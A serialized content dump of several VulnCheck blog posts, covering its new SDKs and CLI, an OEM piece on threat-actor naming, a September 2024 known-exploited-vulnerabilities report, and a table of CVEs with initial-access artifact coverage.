",[1373,64157,5417],{"class":1397},[1373,64159,63779],{"class":4640},[1373,64161,59],{"class":1383},[1373,64163,64164],{"class":63570},"data\n",[1373,64166,64167],{"class":1375,"line":4947},[1373,64168,6520],{"emptyLinePlaceholder":237},[1373,64170,64171,64173,64175,64177,64179,64182],{"class":1375,"line":4952},[1373,64172,63893],{"class":1379},[1373,64174,1384],{"class":1383},[1373,64176,9156],{"class":11735},[1373,64178,59],{"class":1383},[1373,64180,64181],{"class":63570},"cves",[1373,64183,11875],{"class":1383},[18,64185,64186],{},"This example shows how easy it is to lookup the CVE’s for a given PURL using the already provided methods. The SDK takes care of handling the request and parsing the response into a Python object that you can easily explore.",[61,64188,64190],{"id":64189},"explore-and-visualize-data-w-jupyter-notebook","Explore and Visualize Data w\u002F Jupyter Notebook",[18,64192,64193],{},"But VulnCheck isn’t just for applications, it can also help identify trends in security and guide decision-making. 
The VulnCheck SDK for Python integrates seamlessly with Jupyter Notebooks, allowing data scientists, developers and security analysts to explore and visualize data interactively. This is especially useful for investigating patterns across vulnerabilities, such as botnet-related CVEs.",[18,64195,64196,64197,982,64200,64203],{},"Imagine you want to analyze botnet-related vulnerabilities. Here’s how you can pull data from the VulnCheck API and visualize it with Python's ",[886,64198,64199],{},"matplotlib",[886,64201,64202],{},"pandas"," libraries:",[18,64205,64206],{},[68,64207],{":width":10862,"alt":64208,"src":64209},"Botnets Jupyter Notebook","\u002Fblog\u002Fpython-go-sdk\u002Fchart-example.png",[18,64211,64212],{},"This approach is perfect for interactive data exploration and quickly uncovering trends, such as which botnets are associated with the most vulnerabilities.",[61,64214,64216],{"id":64215},"learn-more-about-vulnchecks-new-sdks-jupyter-notebook-integration","Learn more about VulnCheck’s new SDKs & Jupyter Notebook Integration",[18,64218,64219,64224,64225,64224,64230,64224,64235,64224,64240],{},[47,64220,64223],{"href":64221,"rel":64222,":target":10881},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fsdk-go",[51],"Go SDK on Github"," | ",[47,64226,64229],{"href":64227,"rel":64228,":target":10881},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fgo-sdk\u002Fintroduction",[51],"Go SDK Docs",[47,64231,64234],{"href":64232,"rel":64233,":target":10881},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fsdk-python",[51],"Python SDK on Github",[47,64236,64239],{"href":64237,"rel":64238,":target":10881},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fpython-sdk\u002Fintroduction",[51],"Python SDK Docs",[47,64241,64244],{"href":64242,"rel":64243,":target":10881},"https:\u002F\u002Fdocs.vulncheck.com\u002Fintegrations\u002Fjupyter",[51],"Jupyter 
Notebook",[61,64246,202],{"id":201},[18,64248,205],{},[18,64250,208],{},[18,64252,211,64253,217],{},[47,64254,216],{"href":214,"rel":64255},[51],[2901,64257,64258],{},"",{"title":219,"searchDepth":220,"depth":220,"links":64260},[64261,64262,64263,64264,64265],{"id":63492,"depth":220,"text":63493},{"id":63910,"depth":220,"text":63911},{"id":64189,"depth":220,"text":64190},{"id":64215,"depth":220,"text":64216},{"id":201,"depth":220,"text":202},"2024-10-24","VulnCheck delivers intelligence to Your Python and Go Applications with our new SDKs",{"slug":64269},"python-go-sdk","\u002Fblog\u002Fpython-go-sdk",{"title":63482,"description":64267},"blog\u002Fpython-go-sdk",[33173],"T2wlaAulucp0sO9MqbXKxx-ncR6HOI-tPRCaBwYFw3Q",{"id":64276,"title":64277,"articles":7,"authors":64278,"body":64280,"date":64448,"description":64449,"extension":234,"image":7,"link":7,"meta":64450,"navigation":237,"path":64452,"seo":64453,"series":64454,"stem":64458,"subtype":7,"tags":7,"__hash__":64459},"blog\u002Fblog\u002Freducing-attack-surface-risk-oem-series.md","Reducing Attack Surface Risk",[64279],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":64281,"toc":64446},[64282,64285,64288,64291,64294,64297,64300,64309,64323,64326,64329,64332,64335,64338,64341,64355,64358,64364,64372,64375,64383,64386,64400,64403,64406,64409,64415,64418,64435,64438,64441,64444],[18,64283,64284],{},"Every organization and every enterprise response team faces a growing and evolving attack surface. 
Product managers at all cybersecurity vendors are looking to accommodate those objectives.",[18,64286,64287],{},"However, reducing exposures in the attack surface means very different things from organization to organization, and the variability of emerging threats can affect how cyber teams respond to those threats.",[18,64289,64290],{},"An organization’s attack surface varies based on accessible devices connected to the network, web services, and APIs and the exposed vulnerabilities on them. Layer in your adversaries, their tactics, their objectives, the groups to which they belong and their attack techniques and tactics - - and your hands are full as the CISO.",[18,64292,64293],{},"Most cybersecurity products have a significant reliance on external data and intelligence to enrich the accuracy and usefulness of its output for customers. However, many intelligence sources are not machine-readable, and that lack of legibility forces users to work harder to reduce the signal to noise ratio when managing vulnerabilities.",[18,64295,64296],{},"This limits the effectiveness of any cybersecurity product, because the data has to be analyzed by humans. This means the data isn’t able to be consumed quickly enough to prevent vulnerabilities from exploitation by threat actors. Which for product managers building cybersecurity products, means more bugs and escalated support calls by customers.",[18,64298,64299],{},"While the reduction of an organization’s overall attack surface is a general goal of most products, exposure management platforms (EMP), like Sevco Security are purpose-built to ensure that organizations have a material reduction in securing areas of the business that prevents attacks from becoming a full-scale breach. We’ll look more at this below to see a tangible example of how exploit intelligence integrates with an actual EMP solution that are built on the foundation of providing a complete asset inventory. 
(more on this below)",[64301,64302,64306],"callout",{"color":64303,"icon":64304,"target":10881,"to":64305},"secondary","i-mdi-information-box-outline","https:\u002F\u002Fwwv.vulncheck.com\u002Frethinking-intel-cyber-platforms-whitepaper",[18,64307,64308],{},"Download the Rethinking Intelligence in Cybersecurity Platforms Whitepaper to learn more about how to integrate intelligence into your cybersecurity product.",[18,64310,64311,64314,64316,64317,64322],{},[295,64312,64313],{},"The Rise of Exploits - Knowing More About Relevant Threat Actors",[1823,64315],{},"\nWith a 180% increase in breaches with an exploited vulnerability as reported in the ",[47,64318,64321],{"href":64319,"rel":64320,"target":10881},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002Fdbir\u002F",[51],"2024 Verizon Data Breach Investigation Report",", the need for reliable intelligence that can supercharge the platform is essential.",[18,64324,64325],{},"Why? Because it only takes one vulnerability, and just one attacker to weaponize any random vulnerability.",[18,64327,64328],{},"When vulnerability and exploit intelligence does not outpace the adversaries, and when manual effort is required to consume it, cybersecurity products fail to deliver their full, potential value.  Product managers can rethink their workflows and the ways to use intelligence sources to help their end-users respond and defend at machine speeds.",[18,64330,64331],{},"Most intelligence sources from third-party providers require human interpretation, and aren't immediately actionable, leaving many cybersecurity platforms lacking the data to support an informed response.",[18,64333,64334],{},"Knowing your adversary means identifying the threat actors, how they operate, knowledge of their techniques and tactics, and knowing specifically their intentional impact.",[18,64336,64337],{},"Tracking threat actors  is a challenge, given the inconsistent naming strategies across cybersecurity products. 
As such, integrating intelligence to provide end-users with real-time accuracy and visibility into the threat actor ecosystem is essential.",[18,64339,64340],{},"Here are the specific elements of threat actor intelligence that every cybersecurity product leader should consider:",[22,64342,64343,64349],{},[25,64344,64345,64348],{},[295,64346,64347],{},"VariableThreat Actor Naming:"," There are many different naming schemes for Threat Actors. Cybersecurity product vendors name threat actors using their own methodologies, which makes correlating their behaviors more challenging because there isn’t a global standard.",[25,64350,64351,64354],{},[295,64352,64353],{},"Normalizing Threat Actor Names:"," Product managers should look for  ways to normalize  the variable naming conventions leverage the MISP and MITRE conventions, synonyms and schemes from a  credible intelligence provider. Product managers should have a working knowledge of how intelligence feeds with threat actor identification indicators can help enrich other data sets - and to be effective, it must be comprehensive. The good example of this is Fancy Bear, also known as G0007, PETROVITE, APT28, SNAKEMACKERAL, Swallowtail, Group 74, Senit and Sofacy to name a few. 
Lookups take time, so it's essential for product managers to streamline the experience for end-users by hosting complete data sets.",[18,64356,64357],{},"Here’s an example of what that should look like for optimal threat actor data query results:",[18,64359,64360],{},[68,64361],{":width":10862,"alt":64362,"src":64363},"cozy-bear","\u002Fblog\u002Foem-series-post-1\u002Fcozy-bear.png",[18,64365,64366,64369,64371],{},[295,64367,64368],{},"Relevant Market Use Case: Exposure and Attack Surface Management",[1823,64370],{},"\nWhile it’s certainly true based on the examples above that timely, accurate intelligence can reduce exposures in the attack surface in many ways - through both a platform that integrates intelligence, but also by way of just using the intelligence.",[18,64373,64374],{},"It’s also interesting to look at tools in the market, like EPM tools, where product teams are taking aggressive, proactive steps to enrich their output to further reduce the attack surface.",[18,64376,64377,64382],{},[47,64378,64381],{"href":64379,"rel":64380},"https:\u002F\u002Fwww.sevcosecurity.com",[51],"Sevco Security"," is truly one of the leaders in the ASM market - in addition to the vulnerability prioritization and exposure management market - who is using data from VulnCheck in its platform.",[18,64384,64385],{},"Sevco enables security teams to find security gaps in their environment and see both exhaustive exploit intelligence on the vulnerabilities detected and comprehensive intelligence on the assets affected – their criticality to operations, the users who access them, the other controls present to protect them.",[18,64387,64388,64389,64393,64394,982,64397,59],{},"Sevco is taking a unique approach to helping their customers reduce exposure to emerging threats with VulnCheck by integrating ",[47,64390,64392],{"href":40745,"rel":64391},[51],"VulnCheck’s Community Tier solutions"," - notably our 
",[47,64395,40672],{"href":40670,"rel":64396},[51],[47,64398,1233],{"href":2871,"rel":64399},[51],[18,64401,64402],{},"Why is Sevco a good example? First, they’ve figured out a very smart way to ingest VulnCheck’s intelligence into their platform to enrich their own data for customers, for example, with our KEV feed that features 200% more known exploited vulnerabilities than CISA KEV. VulnCheck’s data is refreshed continuously so known exploited vulnerabilities from this single feed are instantly available in the Sevco product, and scored by Sevco.",[18,64404,64405],{},"However, starting with a CVE in this intelligence feed is a great starting point to get closer to the root of the exploitation. What product teams are building is the entire story of that CVE, complete with patterns, a full data set and the ability to surface an impact analysis.",[18,64407,64408],{},"The screenshot below shows the added enrichment VulnCheck delivers directly in the Sevco platform that clearly adds a level of timeliness to VulnCheck’s data correlation of intelligence that’s collected, and then recombined into machine-readable feeds.",[18,64410,64411],{},[68,64412],{":width":10862,"alt":64413,"src":64414},"sevco-platform","\u002Fblog\u002Foem-series-post-1\u002Fsevco-platform.png",[18,64416,64417],{},"What is cool about this view that shows a demonstrable reduction in attack surface with VulnCheck’s exploit intelligence inside the Sevco platform that:",[1789,64419,64420,64423,64426,64429,64432],{},[25,64421,64422],{},"Drills down on a single CVE in the Sevco platform, users get a unified view with context of managing exposures.",[25,64424,64425],{},"Shows affected devices with any given CVE.",[25,64427,64428],{},"The severity levels and the overall scoring of a particular CVE based on the CVSS, EPSS and then exploit maturity and weaponization.",[25,64430,64431],{},"MITRE attack techniques in what’s identified.",[25,64433,64434],{},"Exploit intelligence where vulnerabilities are 
identified as exploited in the wild.",[18,64436,64437],{},"In summary, there are many factors that go into selecting intelligence sources to enrich cybersecurity products so that enterprise teams can track toward continuous improvement to drive better, faster data into their products.",[18,64439,64440],{},"Sevco integrates VulnCheck intelligence and combines it with asset criticality, business context and other signals unique to the organization that essentially become ‘asset intelligence’ for the end-user. Its a great combination of vulnerability and exploit intelligence with the complete picture of device and user inventory that delivers a holistic view of the risk unpatched vulnerabilities pose to an organization's environment.",[18,64442,64443],{},"This is the first in a series of examples of how product organizations should be looking to add intelligence across many different classes of cybersecurity platforms and across multiple intelligence-based use cases.",[44317,64445],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":64447},[],"2024-10-23","OEM Use Case Series: Reducing Attack Surface Risk - Know Who Your Adversaries Are and How Naming Conventions Matter in Vulnerability Management",{"slug":64451},"reducing-attack-surface-risk-oem-series","\u002Fblog\u002Freducing-attack-surface-risk-oem-series",{"title":64277,"description":64449},{"title":64455,"color":64456,"icon":64457},"For Cybersecurity Product Teams","emerald","i-mdi-book-open-variant-outline","blog\u002Freducing-attack-surface-risk-oem-series","n2BEK9qI8Bszcs8jeZ71Sj9AgS7NvKdVrBwo1z1WjFk",{"id":64461,"title":64462,"articles":7,"authors":64463,"body":64465,"date":62926,"description":64554,"extension":234,"image":7,"link":7,"meta":64555,"navigation":237,"path":64557,"seo":64558,"series":7,"stem":64559,"subtype":7,"tags":64560,"__hash__":64561},"blog\u002Fblog\u002Fvulncheck-cli-anywhere.md","Bring VulnCheck Anywhere w\u002F VulnCheck 
CLI",[64464],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":64466,"toc":64547},[64467,64470,64474,64477,64482,64486,64489,64495,64499,64506,64512,64516,64529,64536,64538,64540,64542],[18,64468,64469],{},"VulnCheck delivers intelligence to the command line with VulnCheck’s new open source tool, VulnCheck CLI. VulnCheck customers and community members can now access VulnCheck intelligence through CLI across MacOS, Linux and Windows platforms. Browse VulnCheck indices, manage backups and access VulnCheck IP Intelligence offline using a terminal.",[61,64471,64473],{"id":64472},"simplified-interaction-w-vulncheck","Simplified Interaction w\u002F VulnCheck",[18,64475,64476],{},"Eliminate the need to write your own scripts to lookup VulnCheck data using a CLI. The VulnCheck CLI reduces effort by providing seamless access to vulnerability, exploit, and IP intelligence directly from the command line.",[18,64478,64479],{},[68,64480],{":width":10862,"alt":23340,"src":64481},"\u002Fblog\u002Fvulncheck-cli-anywhere\u002Fexploits.png",[61,64483,64485],{"id":64484},"faster-access-and-processing","Faster Access and Processing",[18,64487,64488],{},"Speed up workflows with local copies of VulnCheck data. Download VulnCheck locally to process data faster and more efficiently without requiring thousands of API calls.",[18,64490,64491],{},[68,64492],{":width":10862,"alt":64493,"src":64494},"VulnCheck Backup","\u002Fblog\u002Fvulncheck-cli-anywhere\u002Fdownload-backup.png",[61,64496,64498],{"id":64497},"offline-access-to-vulncheck-intelligence","Offline Access to VulnCheck Intelligence",[18,64500,64501,64502,59],{},"Use VulnCheck IP intelligence in restricted or disconnected environments, such as an air-gapped network or government SCIF, where internet access is unavailable, restricted, or untrusted. 
Learn more about using VulnCheck Offline CLI for IP Intel ",[47,64503,305],{"href":64504,"rel":64505},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fcli\u002Foffline",[51],[18,64507,64508],{},[68,64509],{":width":10862,"alt":64510,"src":64511},"VulnCheck Offline Intelligene","\u002Fblog\u002Fvulncheck-cli-anywhere\u002Foffline-backup.png",[61,64513,64515],{"id":64514},"how-can-i-learn-more-about-vulncheck-cli","How can I learn more about VulnCheck CLI",[18,64517,64518,64519,64523,64524,59],{},"The VulnCheck CLI is available on ",[47,64520,2485],{"href":64521,"rel":64522},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcli",[51]," and can be easily ",[47,64525,64528],{"href":64526,"rel":64527},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fcli\u002Fintroduction#how-can-i-access-vulncheck-cli",[51],"installed on MacOS, Linux and Windows",[18,64530,64531,64532,59],{},"A list of example CLI commands is available ",[47,64533,305],{"href":64534,"rel":64535},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fcli\u002Fexamples",[51],[61,64537,202],{"id":201},[18,64539,205],{},[18,64541,208],{},[18,64543,211,64544,217],{},[47,64545,216],{"href":214,"rel":64546},[51],{"title":219,"searchDepth":220,"depth":220,"links":64548},[64549,64550,64551,64552,64553],{"id":64472,"depth":220,"text":64473},{"id":64484,"depth":220,"text":64485},{"id":64497,"depth":220,"text":64498},{"id":64514,"depth":220,"text":64515},{"id":201,"depth":220,"text":202},"VulnCheck delivers intelligence to the command line with VulnCheck’s new open source tool, VulnCheck 
CLI.",{"slug":64556},"vulncheck-cli-anywhere","\u002Fblog\u002Fvulncheck-cli-anywhere",{"title":64462,"description":64554},"blog\u002Fvulncheck-cli-anywhere",[33173,23275],"taCHylB15XV_6LXoErj06Vqsicf1g1H2x4RR_wUHUD4",{"id":64563,"title":64564,"articles":64565,"authors":64569,"body":64571,"date":64693,"description":57889,"extension":234,"image":7,"link":7,"meta":64694,"navigation":237,"path":64696,"seo":64697,"series":7,"stem":64698,"subtype":7,"tags":64699,"__hash__":64700},"blog\u002Fblog\u002Fkev-report-september-2024.md","VulnCheck Exploited Vulnerabilities Report - September 2024",[64566],{"title":64567,"source":61436,"link":64568,"date":62770},"Risky Biz News: China says the US is framing other countries for espionage operations","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-china-says-the-us-is-framing-other-countries-for-espionage-operations\u002F",[64570],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":64572,"toc":64690},[64573,64582,64584,64598,64602,64607,64610,64613,64617,64622,64625,64628,64632,64637,64640,64643,64647,64652,64655,64662,64666,64679,64681,64683,64685],[18,64574,64575,64576,64581],{},"In September, VulnCheck identified evidence of 78 CVEs that were publicly disclosed for the first time as exploited in the wild. 
The disclosure of known exploited vulnerabilities was from 21 different sources including a detailed ",[47,64577,64580],{"href":64578,"rel":64579},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fflax-typhoon-botnet",[51],"flax typhoon botnet report from the five eyes agencies"," which we covered in detail last month.",[1920,64583,20],{"id":3520},[22,64585,64586,64589,64592,64595],{},[25,64587,64588],{},"In September, VulnCheck identified 78 CVEs that were publicly disclosed for the first time as exploited in the wild",[25,64590,64591],{},"Software \u002F Product Categories that topped the list included Network Edge Devices, Open Source Software, Server Software and Desktop Applications.",[25,64593,64594],{},"29.5% of September’s KEVs had exploitation evidence within one month of their CVE publication date, while 53.9% were exploited within a year.",[25,64596,64597],{},"As of October 9th, 9 of the 78 Known Exploited Vulnerabilities are still awaiting analysis by NIST NVD.",[1920,64599,64601],{"id":64600},"september-product-categories-and-vendors","September Product Categories and Vendors",[18,64603,64604],{},[68,64605],{":width":10862,"alt":58618,"src":64606},"\u002Fblog\u002Fkev-report-september-2024\u002Fvulncheck-kev-september-categories.png",[18,64608,64609],{},"In September, I explored the product categories and vendors associated with known exploitation disclosed during the month. 
The top targeted categories were Network Edge Devices (28.2%), Open Source Software (16.7%), and Service Software (12.8%).",[18,64611,64612],{},"Network Edge Devices, consistently targeted by threat actors, highlight the importance of maintaining timely patch management processes, especially for internet-facing devices like network routers, modems and firewalls.",[1920,64614,64616],{"id":64615},"who-reported-known-exploited-vulnerabilities","Who Reported Known Exploited Vulnerabilities",[18,64618,64619],{},[68,64620],{":width":10862,"alt":58618,"src":64621},"\u002Fblog\u002Fkev-report-september-2024\u002Fsept-kev-source.png",[18,64623,64624],{},"In September, 21 different sources disclosed known exploited vulnerabilities (KEVs). Notably, the Five Eyes agencies released a detailed report on the Flax Typhoon botnet, uncovering exploitation evidence for 25 CVEs that previously lacked public reports of exploitation.",[18,64626,64627],{},"Shadowserver has shown a noticeable increase in disclosed exploitation activity. Additionally, CISA KEV added four older vulnerabilities in September from Draytek, Oracle (2), and SAP, marking the first public exploitation evidence for these products.",[1920,64629,64631],{"id":64630},"time-to-publicly-reported-exploitation","Time to Publicly Reported Exploitation",[18,64633,64634],{},[68,64635],{":width":10862,"alt":58618,"src":64636},"\u002Fblog\u002Fkev-report-september-2024\u002Ftime-to-exploitation.png",[18,64638,64639],{},"A common question is: How quickly are known vulnerabilities exploited? To explore this, we analyzed 78 known exploited vulnerabilities (KEVs), comparing the time between their NVD publication and public reports of exploitation.",[18,64641,64642],{},"Our findings show that 29.5% of September’s KEVs had exploitation evidence within one month of their CVE publication, while 53.9% were exploited within a year. 
We plan to expand this research to cover a broader set of KEVs for deeper insights in the future on time to exploitation.",[1920,64644,64646],{"id":64645},"a-look-at-septembers-known-exploited-vulnerabilities-mapped-to-scoring-system","A look at September’s Known Exploited Vulnerabilities Mapped to Scoring System",[18,64648,64649],{},[68,64650],{":width":10862,"alt":58618,"src":64651},"\u002Fblog\u002Fkev-report-september-2024\u002Fsept-kev-epss-cvss.png",[18,64653,64654],{},"We've continued to analyze Known Exploitation in relation to vulnerability scoring systems, specifically CVSS and EPSS. Our goal is to provide insights into how these scoring systems can better reflect known exploitation and emerging threats. To enhance visibility into CVSS and EPSS, I created a plot of known exploitation mapped to these systems. Yellow indicates higher density, while purple represents lower density of CVEs associated with known exploitation. By applying an EPSS score (Early October scoring) of 0.1 or a 10% probability of exploitation or higher, we find that 20 CVEs (25.6%) align with Known Exploitation captured for the first time during June, July and August. With a CVSS-BT score of 9 or higher, 36 CVEs (46.1%) map to Known Exploitation. 
We plan to explore scoring systems further to provide deeper insights when we have more time.",[18,64656,64657,64658,59],{},"Related to the topic of vulnerability prioritization, we suggest exploring: ",[47,64659,64661],{"href":54458,"rel":64660},[51],"Taking an Evidence Based Approach to Prioritization",[1920,64663,64665],{"id":64664},"access-vulncheck-known-exploited-vulnerabilities-kev-catalog","Access VulnCheck Known Exploited Vulnerabilities (KEV) Catalog",[18,64667,64668,64669,64672,64673,982,64676,59],{},"For those eager to dive deeper into known exploited vulnerabilities, you can start by utilizing ",[47,64670,28667],{"href":40745,"rel":64671},[51]," a free resource including ",[47,64674,1233],{"href":2871,"rel":64675},[51],[47,64677,40672],{"href":40670,"rel":64678},[51],[61,64680,202],{"id":201},[18,64682,205],{},[18,64684,208],{},[18,64686,211,64687,217],{},[47,64688,216],{"href":214,"rel":64689},[51],{"title":219,"searchDepth":220,"depth":220,"links":64691},[64692],{"id":201,"depth":220,"text":202},"2024-10-13",{"slug":64695},"kev-report-september-2024","\u002Fblog\u002Fkev-report-september-2024",{"title":64564,"description":57889},"blog\u002Fkev-report-september-2024",[1279],"acehQiewcYGmiYhWxoEEzpCf-e0EmmJNntHd_VYptoU",{"id":64702,"title":64703,"articles":7,"authors":64704,"body":64706,"date":62705,"description":65159,"extension":234,"image":7,"link":7,"meta":65160,"navigation":237,"path":65162,"seo":65163,"series":7,"stem":65164,"subtype":7,"tags":65165,"__hash__":65166},"blog\u002Fblog\u002Finitial-access-intelligence-september-2024.md","VulnCheck Initial Access Intelligence Update - September 2024",[64705],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":64707,"toc":65154},[64708,64710,64713,64720,64726,64729,64746,64750,65139,65141,65147,65149],[18,64709,59412],{},[18,64711,64712],{},"In September 2024, VulnCheck crossed 290+ Initial Access Intelligence (IAI) artifacts, developing artifacts for 16 CVEs, covering 14 different 
vendors and products. 7 of the 14 have confirmed exploitation activity as of October 7th, 2024.",[18,64714,64715,64716,64719],{},"Notably, we added IAI coverage for CVE-2023-50386, CVE-2019-7256, and CVE-2023-35843 which were discovered to be a target of the recently reported ",[47,64717,62506],{"href":62504,"rel":64718},[51]," and continue to expand our coverage of the CVEs targeted by this botnet.",[18,64721,64722],{},[68,64723],{":width":10862,"alt":64724,"src":64725},"Initial Access Intelligence - September 2024","\u002Fblog\u002Finitial-access-intelligence-september-2024\u002Finitial-access-september-2024.png",[18,64727,64728],{},"To provide better visibility into these updates, we’ve broken down September’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,64730,64731,64733,64735,64737,64739,64741,64743],{},[25,64732,325],{},[25,64734,59440],{},[25,64736,59443],{},[25,64738,59446],{},[25,64740,59449],{},[25,64742,59452],{},[25,64744,64745],{},"Greynoise\u002FCensys\u002FShodan queries",[61,64747,64749],{"id":64748},"september-2024-initial-access-artifacts","September 2024 Initial Access Artifacts",[307,64751,64752,64774],{},[310,64753,64754],{},[313,64755,64756,64758,64760,64762,64764,64766,64768,64770,64772],{},[316,64757,59471],{},[316,64759,59474],{},[316,64761,319],{},[316,64763,59479],{},[316,64765,59482],{},[316,64767,59485],{},[316,64769,59488],{},[316,64771,61654],{},[316,64773,61657],{},[336,64775,64776,64799,64821,64844,64867,64890,64913,64935,64957,64980,65003,65026,65048,65071,65093,65116],{},[313,64777,64778,64781,64784,64787,64789,64791,64793,64795,64797],{},[341,64779,64780],{},"Traccar Image Upload Path Traversal 
RCE",[341,64782,64783],{},"2024-09-05",[341,64785,64786],{},"CVE-2024-24809",[341,64788,59510],{},[341,64790,59510],{},[341,64792,59510],{},[341,64794,59510],{},[341,64796,59510],{},[341,64798],{},[313,64800,64801,64804,64806,64809,64811,64813,64815,64817,64819],{},[341,64802,64803],{},"Traccar Unrestricted File Upload",[341,64805,64783],{},[341,64807,64808],{},"CVE-2024-31214",[341,64810,59510],{},[341,64812,59510],{},[341,64814,59510],{},[341,64816,59510],{},[341,64818,59510],{},[341,64820],{},[313,64822,64823,64826,64829,64832,64834,64836,64838,64840,64842],{},[341,64824,64825],{},"GiveWP Remote Code Execution",[341,64827,64828],{},"2024-09-06",[341,64830,64831],{},"CVE-2024-5932",[341,64833,59510],{},[341,64835,59510],{},[341,64837,59510],{},[341,64839,59510],{},[341,64841,59510],{},[341,64843],{},[313,64845,64846,64849,64852,64855,64857,64859,64861,64863,64865],{},[341,64847,64848],{},"Apache OFBiz CSV Data File Webshell",[341,64850,64851],{},"2024-09-10",[341,64853,64854],{},"CVE-2024-45195",[341,64856,59510],{},[341,64858,59510],{},[341,64860,59510],{},[341,64862,59510],{},[341,64864,59510],{},[341,64866,59510],{},[313,64868,64869,64872,64875,64878,64880,64882,64884,64886,64888],{},[341,64870,64871],{},"Zyxel nebula_ap_redirect Crash",[341,64873,64874],{},"2024-09-11",[341,64876,64877],{},"CVE-2024-7261",[341,64879],{},[341,64881],{},[341,64883,59510],{},[341,64885,59510],{},[341,64887,59510],{},[341,64889],{},[313,64891,64892,64895,64898,64901,64903,64905,64907,64909,64911],{},[341,64893,64894],{},"ssssssss Spider Flow Command Injection",[341,64896,64897],{},"2024-09-12",[341,64899,64900],{},"CVE-2024-0195",[341,64902,59510],{},[341,64904,59510],{},[341,64906,59510],{},[341,64908,59510],{},[341,64910,59510],{},[341,64912],{},[313,64914,64915,64918,64920,64923,64925,64927,64929,64931,64933],{},[341,64916,64917],{},"Zyxel NAS Auth Bypass and Configuration 
Leak",[341,64919,64897],{},[341,64921,64922],{},"CVE-2024-6342",[341,64924,59510],{},[341,64926,59510],{},[341,64928,59510],{},[341,64930,59510],{},[341,64932,59510],{},[341,64934],{},[313,64936,64937,64940,64942,64945,64947,64949,64951,64953,64955],{},[341,64938,64939],{},"SPIP Bigup Plugin Remote Code Execution",[341,64941,64897],{},[341,64943,64944],{},"CVE-2024-8517",[341,64946,59510],{},[341,64948,59510],{},[341,64950,59510],{},[341,64952,59510],{},[341,64954,59510],{},[341,64956],{},[313,64958,64959,64962,64965,64968,64970,64972,64974,64976,64978],{},[341,64960,64961],{},"Apache OFBiz Stats Screen SSRF",[341,64963,64964],{},"2024-09-18",[341,64966,64967],{},"CVE-2024-45507",[341,64969,59510],{},[341,64971,59510],{},[341,64973,59510],{},[341,64975,59510],{},[341,64977,59510],{},[341,64979],{},[313,64981,64982,64985,64988,64991,64993,64995,64997,64999,65001],{},[341,64983,64984],{},"Progress WhatsUp Gold SQL Injection",[341,64986,64987],{},"2024-09-20",[341,64989,64990],{},"CVE-2024-6670",[341,64992,59510],{},[341,64994,59510],{},[341,64996,59510],{},[341,64998,59510],{},[341,65000,59510],{},[341,65002],{},[313,65004,65005,65008,65011,65014,65016,65018,65020,65022,65024],{},[341,65006,65007],{},"Sudo Heap-based Overflow \"Baron Samedit\" Local Privilege Escalation",[341,65009,65010],{},"2024-09-25",[341,65012,65013],{},"CVE-2021-3156",[341,65015,59510],{},[341,65017,59510],{},[341,65019],{},[341,65021],{},[341,65023],{},[341,65025],{},[313,65027,65028,65031,65033,65036,65038,65040,65042,65044,65046],{},[341,65029,65030],{},"Apache Solr Configuration Backup RCE",[341,65032,65010],{},[341,65034,65035],{},"CVE-2023-50386",[341,65037,59510],{},[341,65039,59510],{},[341,65041,59510],{},[341,65043,59510],{},[341,65045,59510],{},[341,65047,59510],{},[313,65049,65050,65053,65056,65059,65061,65063,65065,65067,65069],{},[341,65051,65052],{},"Linear eMerge e3-Series ReaderNo Command 
Injection",[341,65054,65055],{},"2024-09-26",[341,65057,65058],{},"CVE-2019-7256",[341,65060],{},[341,65062],{},[341,65064,59510],{},[341,65066,59510],{},[341,65068,59510],{},[341,65070],{},[313,65072,65073,65076,65078,65081,65083,65085,65087,65089,65091],{},[341,65074,65075],{},"Spring Cloud Data Flow Remote Code Execution",[341,65077,65055],{},[341,65079,65080],{},"CVE-2024-37084",[341,65082,59510],{},[341,65084,59510],{},[341,65086,59510],{},[341,65088],{},[341,65090],{},[341,65092],{},[313,65094,65095,65098,65101,65104,65106,65108,65110,65112,65114],{},[341,65096,65097],{},"NocoDB Path Traversal",[341,65099,65100],{},"2024-09-27",[341,65102,65103],{},"CVE-2023-35843",[341,65105,59510],{},[341,65107],{},[341,65109,59510],{},[341,65111,59510],{},[341,65113,59510],{},[341,65115],{},[313,65117,65118,65121,65124,65127,65129,65131,65133,65135,65137],{},[341,65119,65120],{},"Zimbra RCPT TO Command Injection",[341,65122,65123],{},"2024-09-30",[341,65125,65126],{},"CVE-2024-45519",[341,65128,59510],{},[341,65130,59510],{},[341,65132,59510],{},[341,65134,59510],{},[341,65136,59510],{},[341,65138,59510],{},[61,65140,59830],{"id":59829},[18,65142,65143,65144,59],{},"VulnCheck's exploit proof of concept (PoC) and version scanner code is written in the Go programming language. They are provided with a Dockerfile for ease of use. 
